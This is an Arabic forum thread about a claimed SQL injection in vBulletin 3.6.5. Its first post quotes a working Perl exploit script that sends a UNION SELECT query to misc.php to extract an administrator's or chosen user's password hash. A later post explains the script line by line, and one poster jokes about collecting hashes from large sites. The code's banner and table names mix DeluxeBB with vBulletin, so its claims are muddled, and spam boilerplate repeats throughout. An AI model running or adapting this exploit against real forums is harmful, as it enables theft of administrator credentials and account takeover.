vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

ياخذ ومايعطي · #1 (**permalink**) 04-19-2007, 01:16 AM

والله ياشباب يوم شفت التطبيق على الموقع الرئيسي
للمنتديات هني تذكرت المنتديات العربية
انا ماحب اقول انوا الثغره تم كشفها بالاول من قبل سيوف الاسلام وبعدين تم الكشف عنها وفضحها فريق تركي

المهم
اعطيكم المختصر

اقتباس:

المشاركة الأصلية كتبت بواسطة SnIpEr_SyRiA

مرحبا
جايبلكم ثغرة اليوم نص المواقع مصاب بيهة
ثغرة تعطيك بسورد المشرف العام او المدير حسب رقم الاعضوية يلي انت تطلبو
لتحميل الدرس الدرس فيديو والحمد الله مني
ويرجا عند النقل نقل المصدر وكاتب الموضوع
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع
تحياتي
sniper_syria
القناص سوري
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

------------------------------------------------
كااتب الرد shap7_haCker
[

كود PHP:

  #!/usr/bin/perl

 
use IO::Socket;

 
print q{

######################################################

# DeluxeBB Remote SQL Injection Exploit #

# vbulletin Remote SQL Injection Exploit #

# // SekoMirza // Turkish Hackerz #

######################################################

};

تحياتى

|11| 

 
if (!$ARGV[2]) {

 
print q{ 

Usage: perl dbbxpl.pl host /directory/ victim_userid 

 
perl dbbxpl.pl www.somesite.com /forum/ 1

 
};

 
}

 
$server = $ARGV[0];

$dir = $ARGV[1];

$user = $ARGV[2];

$myuser = $ARGV[3];

$mypass = $ARGV[4];

$myid = $ARGV[5];

 
print "-----------------------------------------------------------------------

-------------------------\r\n";

print "[>] SERVER: $server\r\n";

print "[>] DIR: $dir\r\n";

print "[>] USERID: $user\r\n";

print "-----------------------------------------------------------------------

-------------------------\r\n\r\n";

 
$server =~ s/(http://)//eg;

 
$path = $dir;

$path .=

 
"misc.php?sub=profile&*_**_**_**_*=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0

,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

 
20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

 
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

 
print "[+] CONNECTED\r\n";

print "[~] SENDING QUERY...\r\n";

print $socket "GET $path HTTP/1.1\r\n";

print $socket "Host: $server\r\n";

print $socket "Accept: */*\r\n";

print $socket "Connection: close\r\n\r\n";

print "[+] DONE!\r\n\r\n";

 
print "--[ REPORT ]-----------------------------------------------------------------------

-------------\r\n";

while ($answer = <$socket>)

{

 
if ($answer =~/(w{32})/)

{

 
if ($1 ne 0) {

print "Password Hash is: ".$1."\r\n";

print "-----------------------------------------------------------------------

---------------\r\n";

 
}

exit();

}

 
}

print "-----------------------------------------------------------------------

-------------------------\r\n";

 
#########################################################

#Shoutz: #

# #

# My Sweet -> Caramel #

# For Mp3s -> Hypn0sis #

# For Support -> [WwW.StarHack.Org] #

# My Bro -> PhantomOrchid #

# My Preceptor -> Earnk Kazno #

#########################################################

]

اذا عرف السبب بطل العجب والله مشكله جاري حل المشكله والترقيع معه انو الحمدلله ماخذ احتياط مسبق ؟؟

رابط الموضوع
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

ياخذ ومايعطي · #2 (**permalink**) 04-19-2007, 01:59 AM

نعود الليكم لان جون يمكن اصاب بالجنون
اللمهم ماعلينا
ابو عمر ولا هنت ياقلبي اذا نزلت النسخه 3.6.6
هذي الهاكات اللي نبيها

2 ----> استبدال رابط الموضوع إلى عنوانه
3 ----> منع المشرف من إعطاء إنذار خارج قسمه
4 ----> آخر عشر رسائل خاصة في لوحة التحكم
5 ----> أستبدال أسم كاتب الموضوع بأسم عضو آخر
6 ---->المسمى الاضافي للعضو او الوصف للعضو
7 ----> البنرات العشوائية للمنتدى تحكم كامل وتقرير عن الضغطات والزيارات للبنر محدث
8 ----> تصغير الصور تلقائيا بمواصفات خياليه
9 ----> التحكم بخيارات التوقيع المتقدم مثل الأبعاد والأسطر والصور والحجم محدث

12----> منع إرسال روابط عن طريق الرسائل الخاصة
14----> تحويل الوقت إلى صباحا مساء والتاريخ الهجري
15----> الرسائل الخاصة الإدارية الأوتوماتيكية عند نقل حذف تثبيت أي موضوع
16----> منع استخدام الرسائل الخاصة إلا بعد عدد معين
د
18----> هاك أفضل المشاركين خلال الشهر
19----> شريط متحرك بالأعلى بلوحة تحكم بالسرعة واللون والحجم وغيره

21----> هاك كشف الرسائل الخاصة مميزات رائعة بتحكم
23----> المتواجدون اليوم بمميزات رهيبه

27----> هاك الدخول بأسماء الأعضاء للمدير بدون رقم سري
28----> جعل الموضوع قديما أو وضعه في الأعلى
29----> التأكد من وجود الموضوع عند كتابته
30----> عدم السماح للعضو بتقييم موضوعه
31----> ألوان رتب المجموعات
32----> تحديد الايبي الحقيقي
33----> إعلانات في الصفحة الرئيسية بتحكم مميز
34----> فصل المواضيع العادية عن المثبتة المطور
35----> ضغط وتسريع تصفح المنتدى
36----> منتج تعطيل التوقيع في الأقسام مثل الإسلامي وغيره
37----> منع الحذف الفعلي للمشرفين
38----> إحصائيات حركة المشرفين

42----> أيقونه أو صوره لكل قسم >>>> يحتاج تعديل قوالب
43----> الشريط المرن بتحكم كامل >>>> يحتاج تعديل قوالب
44----> عرض بيانات عن الـ Ip بالتفصيل >>>> يحتاج تعديل قوالب
45----> الصندوق الماسي >>>> يحتاج تعديل قوالب
46----> الاوسمه الإصدار الجديد المميز >>>> يحتاج تعديل قوالب

48----> من مواضيع الكاتب في البوست بت >>>> يحتاج تعديل قوالب
49----> بنر لكل مجلس بشكل مستقل عن بقية المجالس >>>> يحتاج تعديل قوالب

50----> إحصائية المنتدى المنسقة (( مثل مجموع المسجلين والمتصلين والمواضيع والمشاركات )) >>>> يحتاج تعديل قوالب
52----> انشط عضو هذا اليوم >>>> يحتاج تعديل قوالب
57----> عرض استفتاء معين فى الرئيسية جديد
59----> حذف الرسائل الخاصة أقدم من X يوم جديد
62----> بداية افتتاح المنتدى >>>> يحتاج تعديل قوالب جديد

64----> حذف البريد من المواضيع ومن الرسائل الخاصة للنسخة جديد
65
66----> مراسل الأعضاء الغير متفاعلين جديد
67----> منتج لوحة الشرف ( المتميزين ) >>>> يحتاج تعديل قوالب جديد اختر مابين الهاك والهاك رقم 50 صندوق التميزد
69----> حل مشكلة عدم ظهور اسم المرفق باللغة العربية جديد
70----> الانتقال التلقائي للرسائل البريدية جدي

والله ابو عمر هذول اكفايه لان الباقي يسبب ارهاق للمنتدي وصاحب المنتدي ومشكور على النسخ الاكثر من رائعه
اللي تنزل من ايادي بارك الله فيها

HaRD-2-GeT · #3 (**permalink**) 04-19-2007, 02:40 AM

يعطيك العافية ,, على المعلومة

وهذا رابط الموضوع في الشركة

كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

الموضوع اللي موجود في الشركة ,, يقول ,, ان هذي مو ثغرة ,, لان السكربت يبحث عن الهاش اللي موجود في الصفحة

ويقول أيضا انه يراسل الموقع يشيلونها من الثغرات

,,,

على فكرة ,, md5 الهاش ,, اذا كان مكون من رموز ,, وحروف واكثر من 15 حرف ,,

فما أعتقد , إن في خطورة , لانه مستحيل فك تشفيره

حتى لو كان السالت موجود

,,, ولا أنا غلطان

ياخذ ومايعطي · #4 (**permalink**) 04-19-2007, 03:36 AM

هو معاك حق في الكلام
وهم جون معاه حق بس المشكله خليتها تتعدا جون وتدعى الادعاءات كلها طيب هاللحين

اللمهم طريقة العمل شوي وشروحات معاها
يقوم بلتصال بملف
"tcp",
على بورت
80
اذا استجاب ملف tcp
لا يضهر لك هذيه الرسالة
"[-] CONNECTION FAILED
اذا تم بستجابة
تضهر لك البسورد
print "[+] CONNECTED\r\n";
الاتصال
print "[~] SENDING QUERY...\r\n";
تجربة سريعة
print $socket "GET $path HTTP/1.1\r\n";
سحب عن طريق الـpath$
print $socket "Host: $server\r\n";
رابط الموقع
print $socket "Accept: */*\r\n";
تم الموافق االدخول
print $socket "Connection: close\r\n\r\n";
لم يتم موافقة
print "[+] DONE!\r\n\r\n";
المشكله تكمن انها نفس الحظ ماعرف ماهي البيئه الحاويه اللها

نتابع عشان يروح ينكر الثغره عدل في السكيورتي
حطيت رابط فيديوا مطبق على منتداه خخخخخخخخخخخخخ
بس الصراحه تحصل على الهاش
وبعد ماتشوف الفيديو راح تحكم من كلامه صح shap7_haCker معه SnIpEr_SyRiA
او كلام جون اللمهم
هذا رابط الفيديوا مباشر يدعم كل شي
كل ما في الموقع من روابط للتحميل مثل صورة لعبة برنامج اغنية مقطع فلم على رسائل مسجات الى يوتيوب سواء للبنات او للشباب لابد من تسجيل اضغط هنا و استمتع مع اجمل و احلى مواضيع

يالله شوفوا ورد اللي خبر ولاتواخذوني على مكان رفع الملف بس تعرف موقع وطاير من امله نستفيد منه شوي

ياخذ ومايعطي · #5 (**permalink**) 04-20-2007, 04:44 AM

ايه والله مشكله مشاهدات على الفاضي محدا شاف الحل طيب راح اخلي الموضوع هذا احط هاشات اكبر المواقع اريح هههههههههههههههههههههههههههههههه

استضافة مواقع	معنى كلمة	رسائل مسجات vshzg ls[hj	دردشة شات ]v]am ahj	افلام مقاطع فلم مقطع
مكتبة فلاش اسلامي	الثقافة الجنسية	صور في صورة	شات صوتي	الأسره المسلمه
ابتسامات خلفيات	العاب جديدة	دليل مواقع	احداثيات gps	القرآن الكريم
بطاقات كروت	جوال موبايل	جافا java	قصص روايات	sitemap
كتب الكترونية	ماسنجر في مسنجر	خطوط	وصلات روابط	العاب بنات للبنات فقط

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
طريقة عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

vbulletin v3.6.5 Remote SQL Injection Exploit النجدة للمنتديات العربية

تطوير و صيانة المنتديات vBulletin